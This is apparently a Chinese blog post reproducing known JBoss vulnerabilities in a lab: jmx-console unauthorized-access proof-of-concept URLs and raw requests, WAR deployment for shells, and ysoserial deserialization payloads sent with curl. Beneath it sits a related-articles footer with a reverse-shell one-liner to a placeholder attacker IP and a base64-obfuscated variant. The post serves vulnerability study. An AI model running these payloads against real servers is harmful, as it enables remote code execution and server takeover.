JBoss常见漏洞整理

最新推荐文章于 2025-03-23 22:56:22 发布
最新推荐文章于 2025-03-23 22:56:22 发布
阅读量1.2w 收藏 31
点赞数 14
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58434634/article/details/117434173
版权

image-20210531233524804

JBoss常见漏洞整理

JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。

JBoss高危漏洞主要涉及到以下两种。

  • 第一种是利用未授权访问进入JBoss后台进行文件上传的漏洞,例如:CVE-2007-1036CVE-2010-0738,CVE-2006-5750以及void addURL() void deploy() 上传war包。
  • 另一种是利用Java反序列化进行远程代码执行的漏洞,例如:CVE-2015-7501CVE-2017-7504CVE-2017-12149CVE-2013-4810

img

访问控制不严导致的漏洞

CVE-2007-1036CVE-2010-0738,CVE-2006-5750

CVE-2007-1036CVE-2010-0738,CVE-2006-5750 都是利用的一个地方,CVE-2006-5750,CVE-2007-1036是这个地址的两种不同访问方式导致两种未授权访问漏洞,CVE-2010-0738是CVE-2007-1036的绕过。

漏洞页面如下:

http://192.168.10.128:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin:service=DeploymentFileRepository

image-20210531212142400

CVE-2007-1036

poc如下,会生成 http://192.168.10.128:8080/b/b.jsp页面,页面内容是 test

http://192.168.10.128:8080/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=b.war&arg1=b&arg2=.jsp&arg3=%3C%25out.println%28%22test%22%29%3B%25%3E&arg4=True
CVE-2006-5750

poc如下,会生成http://192.168.10.128:8080/b/b.jsp页面,页面内容是 test

http://192.168.64.129:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=c.war&argType=java.lang.String&arg1=c&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3C%25out.println%28%22test%22%29%3B%25%3E&argType=boolean&arg4=True
CVE-2007-1036

数据包如下,会http://192.168.10.128:8080/b/b.jsp页面,页面内容是test,注意是HEAD请求

HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=a.war&arg1=a&arg2=.jsp&arg3=%3C%25out.println%28%22test%22%29%3B%25%3E&arg4=True HTTP/1.1
Host: 192.168.10.128:8080
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
Origin: http://192.168.10.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.10.128:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin:service=DeploymentFileRepository
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=EB1FF2DBD5FAE956570012622CA45C8D
Connection: close

void addURL() void deploy()远程上传war包getshell

这两种都是利用的整个后台的未授权访问,或者弱口令登录后台,然后部署war包,进而getshell

void addURL()

远程上传war访问地址

http://192.168.10.128:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL

image-20210531230752074

image-20210531230633639

image-20210531230654789

image-20210531230840941

void deploy()

远程上传war包访问地址:

http://192.168.10.128:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system%3Aservice%3DMainDeployer

image-20210531231051472

image-20210531231218769

image-20210531231232681

image-20210531231256907

反序列化导致的漏洞

之前爆出来的反序列化漏洞主要有 CVE-2017-7504 CVE-2013-4810 CVE-2015-7501 CVE-2017-12149,但其实利用方式完全一致,都是因为某个接口接收序列化数据后会进行反序列化进而触发反序列化漏洞。

所以这些漏洞payload可以共用一个,只是请求的路径不一样。(网上给出的影响范围并不靠谱,使用vulhub的CVE-2017-7504测试环境,jboss版本为4.0.5,以下四个漏洞全部测试成功,所以并不能单纯靠看版本号来确定是不是存在漏洞)

利用方式如下:

生成payload
java -jar ysoserial.jar CommonsCollections5 "touch /tmp/success" > 1.ser

# CVE-2017-7504
curl http://your-ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser
# CVE-2013-4810
curl http://your-ip:8080/invoker/EJBInvokerServlet --data-binary @1.ser
# CVE-2015-7501
curl http://your-ip:8080/invoker/JMXInvokerServlet --data-binary @1.ser
# CVE-2017-12149
curl http://your-ip:8080/invoker/readonly --data-binary @1.ser

image-20210531183703127

每次请求后都能生成一个success文件

image-20210531183217369

可根据页面来简单判断是否存在漏洞,分别访问这四个页面:

/jbossmq-httpil/HTTPServerILServlet

image-20210531232527134

/invoker/EJBInvokerServlet

image-20210531232637970

/invoker/JMXInvokerServlet

image-20210531232728267

/invoker/readonly

image-20210531232826437

用vulhub搭建CVE-2017-12149漏洞环境,用脚本验证 发现除 /jbossmq-httpil/HTTPServerILServlet 外其他三个漏洞皆利用成功

image-20210531185955149

访问地址 发现这个页面不存在

image-20210531190217911

在这里插入图片描述

中间件漏洞 -- JBoss
weixin_44769042的博客
11-17 4612
中间件漏洞记录--5 jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。默认端口:8080,9990 目录 一、JBoss JMXInvokerServlet 反序列化漏洞 1、环境搭建:docker + vulh...
漏洞复现】JBoss 中间件漏洞
qq_48368964的博客
08-06 1590
JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可,可以在任何商业应⽤中免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域,JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss⼴为流⾏。
常见中间件漏洞攻略-Jboss
m0_66808441的博客
03-23 547
【代码】常见中间件漏洞攻略-Jboss篇。
JBoss漏洞
周星星的博客
10-24 1339
JBoss漏洞的简单学习记录
深入浅出带你学习JBoss中间件常见漏洞
Spontaneous_0的博客
02-13 1213
深入浅出带你学习JBoss中间件常见漏洞
JBoss中间件漏洞汇总
热门推荐
混子
11-18 1万+
目录 一、JBoss是什么? 二、安装环境 1. Jdk 2. 下载JBoos4、6,并进行配置 三、 反序列漏洞 1. HttpInvoker 组件(CVE-2017-12149) 2. JMXInvokerServlet组件(CVE-2015-7501) 3. JBossMQ(CVE-2017-7504) 4.EJBInvokerServlet组件(CVE-2013-4810) 四、 War后门文件部署 1. admin-cosole(爆红接着传) 2. JMX-console.
JBOSS未授权漏洞总结
m0_64481831的博客
04-03 1899
JBOSS是一个基于J2EE的开放源代码应用服务器,也是一个管理EJB的容器和服务器,默认使用8080端口监听。JBOSS未授权访问漏洞介绍漏洞原理JBOSS未授权漏洞在默认情况下无需账号密码就可以直接访问后台管理控制台页面(),导致攻击者可以获取网站信息、上传webshell,获取服务器权限等。
JBoss漏洞总结
qq1325928591的博客
12-28 4311
近期遇到一次考核,两题都是关于jboss的相关漏洞,虽然都复现过,毕竟脑子有限,还是进行总结一下 jboss一般有2种类型的的漏洞: a.访问控制不严导致的漏洞 b.反序列化漏洞 Jboss管理控制台说明 jboss 4.x 及其之前的版本 console 管理路径为 /jmx-console/ 和 /web-console/ jmx-console的配置文件为: /opt/jboss/jboss4/server/default/deploy/jmx-console.war/WEB-INF/jboss-w
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2547
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
常见中间件漏洞(三、Jboss合集)
2301_76631050的博客
08-06 1254
JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域JBoss是发展最为迅速应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发这使得JBoss广为流行。
Jboss多个远程命令执行漏洞(CVE-2017-12149、CVE-2015-7501、CVE-2017-7504)
qq_68163788的博客
06-26 1568
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
常见中间件漏洞复现之【Jboss】!
muyuchen110的博客
08-06 1115
Jboss介绍JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可,可以在任何商业应⽤中免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域,JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss⼴为流⾏。漏洞介绍影响范围。
JBOSS漏洞
weixin_30488313的博客
04-26 766
  JBOSS:是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。   JBOSS 端口号:8080   默认密码 :admin ...
Jboss中间件两大漏洞分析
fansenliangren的博客
12-28 1614
反序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。
JBoss 5.x/6.x 反序列化漏洞 CVE-2017-12149 漏洞复现
ADummy的博客
03-03 432
JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149) by ADummy 0x00利用路线 ​ ysoserial生成payload—>上传给网站进行解析—>命令执行 0x01漏洞介绍 ​ Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。 ​ 影
Jboss相关漏洞
谢公子的博客
01-08 3250
目录 Jboss JBoss JMXInvokerServlet 反序列化漏洞(CVE-2015-7501) JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504) JBoss 5.x/6.x 反序列化漏洞复现(CVE-2017-12149) Jboss管理控制台 Jboss4.x Jboss5.x/6.x jboss4.x jmx-console管...
JBoss漏洞总结复现
1ance's blog
10-08 2603
目录简介JBoss发序列化漏洞(CVE-2017-12149)漏洞描述漏洞原理影响范围漏洞复现修复建议JBossMQ JMS反序列化漏洞(CVE-2017-7504)漏洞描述漏洞原理影响范围复现过程修复建议JBoss JMXInvokerServlet反序列化漏洞(CVE-2015-7501)漏洞描述漏洞原理影响范围复现过程修复建议JBoss EJBInvokerServlet 反序列化漏洞(CVE-2013-4810)漏洞描述影响范围复现过程修复建议总结 简介 Jboss是一个基于J2EE的开放源代码的
jboss漏洞
最新发布
03-25
### JBoss漏洞列表及其修复方案 #### 1. JBoss JMXInvokerServlet 反序列化漏洞 (CVE-2015-7501) 该漏洞允许远程攻击者通过发送特制请求到 `JMXInvokerServlet` 来执行任意代码。这是由于未对传入数据进行充分验证而导致的反序列化问题[^1]。 ##### **修复方案** - 升级至最新的 JBoss 版本,其中已修补此漏洞。 - 如果无法立即升级,则可以通过禁用 `JMXInvokerServlet` 或将其从部署中移除来缓解风险[^2]。 --- #### 2. Web 错误页面信息泄露 当服务器返回 HTTP 响应状态码(如 404、500)时,可能会暴露敏感信息,例如绝对路径、WebServer 版本号以及部分源代码片段或 SQL 查询语句等内容[^3]。 ##### **修复方案** - 配置自定义错误页面以隐藏默认错误消息中的敏感细节。 - 使用统一化的错误提示信息替代原始堆栈跟踪或其他调试信息。 - 对应用程序日志记录功能进行审查并确保不会无意间存储过多隐私数据。 --- #### 3. 密码明文传输 某些情况下,默认配置可能导致密码未经加密即在网络上传输,从而增加了被窃听的风险。 ##### **修复方案** - 启用 SSL/TLS 加密连接以保护通信链路的安全性。 - 修改相关组件设置使其支持更强大的身份认证机制而非简单依赖于纯文本形式传递凭证资料。 --- #### 4. Apache JServ Protocol 安全隐患 尽管主要针对 Tomcat 而言,但如果 JBoss 和它集成在一起工作的话也可能受到影响。具体表现为如果开启了不必要的协议选项(比如 AJP),则可能引入额外威胁向量[^4]. ##### **修复措施** - 编辑 `$TOMCAT_HOME/conf/server.xml`,找到 `<Connector>` 标签下对应AJP端口的部分并将之注释掉或者调整其属性值使之不可访问外部网络. ```xml <-- 注释掉以下行 --> <!-- <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" /> --> ``` --- #### 5. RCE 漏洞利用示例 以下是关于如何生成用于测试目的的有效载荷的一个例子: ```bash bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1 ``` 另外还有 Base64 编码方式绕过基本检测手段的方法如下所示: ```bash bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjQ1LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i} ``` 请注意,在实际环境中切勿随意尝试上述命令以免违反法律法规造成损害[^5]! ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值